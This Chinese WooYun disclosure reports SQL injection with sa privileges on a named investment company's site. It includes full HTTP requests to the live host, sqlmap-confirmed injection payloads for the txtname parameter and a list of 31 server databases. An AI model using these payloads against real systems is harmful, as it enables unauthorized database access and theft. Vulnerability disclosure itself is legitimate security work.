当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131742

漏洞标题:银河投资管理公司sa权限注入打包(涉及31库)

相关厂商:银河投资管理公司

漏洞作者: 路人甲

提交时间:2015-08-05 09:36

修复时间:2015-09-19 09:38

公开时间:2015-09-19 09:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

注入点:

POST /bbs/bbslist.aspx?t=17 HTTP/1.1
Content-Length: 749
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Button3=%e7%99%bb%e5%bd%95&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtcontent=1&txtname=t3qA5gbx&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAK6h8yiDgLh4%2bm2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd%2b7q4BwLWlM%2bbAgLz0oe%2bAQLppJj%2bCAKQ2fLiCXD368ohuWU92emfv61CjNe6Q2ln&__VIEWSTATE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFgYCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIOD2QWBgICDw8WAh8BaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAmZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMTuInKqtm%2blpCF6Jw9xgIuMGqvwc


txtname和txtpwd参数

POST /bbs/forget.aspx HTTP/1.1
Content-Length: 628
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.china-galaxy-inv.com/
Host: www.china-galaxy-inv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Button1=%e6%8f%90%e4%ba%a4&ge1%24ImageButton1=&ge1%24txtname=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1%24txtpwd=1&top1%24ImageButton1=&top1%24skey=1&txtname=oSdzP2Kk&__EVENTVALIDATION=/wEWCALDwYzWAQLh4%2bm2CQKrjZKaDwLEhISACwKM54rGBgLz0oe%2bAQLppJj%2bCAKQ2fLiCXih7CD4gBIs2hQoGO8oq2YWm4Pe&__VIEWSTATE=/wEPDwULLTEyNjY2MjAyMzkPZBYCAgIPZBYCAgcPZBYGAgIPDxYCHgdWaXNpYmxlaGRkAgQPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCZg8VAgI0MR4z5pyIMjHml6Xml6k577yaMzDmgLvoo4Hlip4uLi5kAgYPFgIfAWZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBRF0b3AxJEltYWdlQnV0dG9uMQUQZ2UxJEltYWdlQnV0dG9uMWYkSpQqEeji/w4Vct0R0YW7OwlF


txtname参数
注入过程

sqlmap identified the following injection points with a total of
47 HTTP(s) requests:
---
Parameter: txtname (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or
 HAVING clause
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txt
name=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$Image
Button1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' AND 7666=CONV
ERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)
+(SELECT (CASE WHEN (7666=7666) THEN CHAR(49) ELSE CHAR(48) END))
+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+CHAR(113))) AND 'bOov'='
bOov&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAgLh4+m2
CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgLz0oe+A
QLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wEPDwUKM
TUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGKZAIKDw
8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZBYGAgI
PDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHjPmnIgy
MeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db250cm9sc
1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBnZTEkSW
1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txt
name=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$Image
Button1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' UNION ALL SEL
ECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,CHAR(113)+CHAR(107)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(6
9)+CHAR(72)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(105)+CHAR(80)+CHAR(
108)+CHAR(69)+CHAR(105)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(106)+C
HAR(113),NULL-- &txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKc
jrqeAgLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWl
M+bAgLz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTA
TE=/wEPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6a
KE5ZGKZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATF
kAg4PZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUC
AjQxHjPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX
19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b2
4xBRBnZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txt
name=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$Image
Button1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx'; WAITFOR DELA
Y '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeA
gLh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAg
Lz0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/w
EPDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZG
KZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4P
ZBYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxH
jPmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db2
50cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRB
nZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button3=%e7%99%bb%e5%bd%95&ge1$ImageButton1=&ge1$txt
name=%e7%94%a8%e6%88%b7%e5%90%8d%ef%bc%9a&ge1$txtpwd=1&top1$Image
Button1=&top1$skey=1&txtcontent=1&txtname=t3qA5gbx' WAITFOR DELAY
 '0:0:5'--&txtpwd=1&txttitle=Mr.&__EVENTVALIDATION=/wEWDAKcjrqeAg
Lh4+m2CQKrjZKaDwL55Jz4AQKrmr26BwKM54rGBgLEhISACwKd+7q4BwLWlM+bAgL
z0oe+AQLppJj+CAKQ2fLiCVcwfq1kIWFVt0lmPo8t/UMPHxdS&__VIEWSTATE=/wE
PDwUKMTUzMzU1OTY1NQ9kFgICBA9kFggCBA8WAh4EVGV4dAUM5rS75Yqo6aKE5ZGK
ZAIKDw8WAh4HVmlzaWJsZWhkZAIMD2QWAgIDDxYCHglpbm5lcmh0bWwFATFkAg4PZ
BYGAgIPDxYCHwFoZGQCBA8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCAjQxHj
PmnIgyMeaXpeaXqTnvvJozMOaAu+ijgeWKni4uLmQCBg8WAh8DZmQYAQUeX19Db25
0cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFEXRvcDEkSW1hZ2VCdXR0b24xBRBn
ZTEkSW1hZ2VCdXR0b24xKrYCpEBuxyD3YMYTLfaRzAjbWWE=
---
[01:19:24] [INFO] testing Microsoft SQL Server
[01:19:24] [INFO] confirming Microsoft SQL Server
[01:19:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2
.0.50727
back-end DBMS: Microsoft SQL Server 2005

漏洞证明:

权限:

t1.png


数据库

available databases [31]:
[*] a1014135557
[*] AnimationSite
[*] anli
[*] BaiCaoData
[*] ChiHuoData
[*] CimatronData
[*] CompanyData
[*] CusDB
[*] dfjrdb
[*] DomZoneData
[*] doulqdb
[*] flowershop
[*] futureData
[*] hao1317-bd
[*] huayanse
[*] kangjie
[*] LeYuanData
[*] LoginSystem
[*] master
[*] model
[*] msdb
[*] NanChangMeiShiData
[*] public
[*] rowsun
[*] ShopData
[*] SmallHouse
[*] tempdb
[*] Virgo
[*] yidongyun
[*] yinhe
[*] ZiTengData


列表

t2.png


修复方案:

过滤
只测试漏洞,未脱裤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝